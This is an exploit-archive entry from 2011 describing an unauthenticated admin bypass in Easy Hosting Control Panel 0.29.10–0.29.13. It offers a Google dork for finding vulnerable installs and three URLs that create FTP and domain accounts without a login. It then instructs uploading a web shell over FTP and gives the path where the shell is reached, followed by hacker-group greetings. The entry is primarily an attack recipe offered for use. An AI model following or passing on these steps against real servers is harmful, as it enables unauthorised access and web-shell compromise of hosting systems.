Easy Hosting Control Panel Admin Auth Bypass

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Easy Hosting Control Panel Admin Auth Bypass
# Published : 2011-10-04
# Author :
# Previous Title : BOOKSolved 1.2.2 Remote File Disclosure
# Next Title : MARINET CMS (room.php) <= Blind SQL Vulnerability

# Exploit Title: Easy Hosting Control Panel Admin Auth Bypass
# Google Dork: inurl:/ehcp/?op=applyfordomainaccount
# Date: 10/04/2011
# Author: Jasman
# Software Link: https://launchpad.net/ehcp & http://www.ehcp.net
# Version: 0.29.10 - 0.29.13
# Tested on: Ubuntu, Debian


+ Description
Easy Hosting Control Panel designed for hosting of multiple domains on single machine.
It uses LAMP(LinuxApacheMysqlPhp). Its aim:easily installable,easy usage, non-complex,functional


+ Vulnerable:
to add a ftp account & domain does not require a login.

http://site.com/vhosts/ehcp/?op=applyforaccount
http://site.com/vhosts/ehcp/?op=applyforftpaccount
http://site.com/vhosts/ehcp/?op=applyfordomainaccount

+ Exploit 
upload a shell via ftp
http://site.com/vhosts/[username]/[domain]/httpdocs/shell.php

+ Tested On
0.29.13
0.29.11
0.29.10


+ Other Link:
https://bugs.launchpad.net/ehcp/+bug/865889


+ Thank to:
ArRay,`yuda, N4ck0, K4pt3N, samu1241, bejamz, Gameover, antitos, yuki, pokeng, 
aphe_aphe, jos_ali_joe, BlueBoyz, JFry_, Ihsana'Lab, Anaski Crew, Forum.ExploreCrew
Exploit-Id, FeeLcoMz All Indonesian Hacker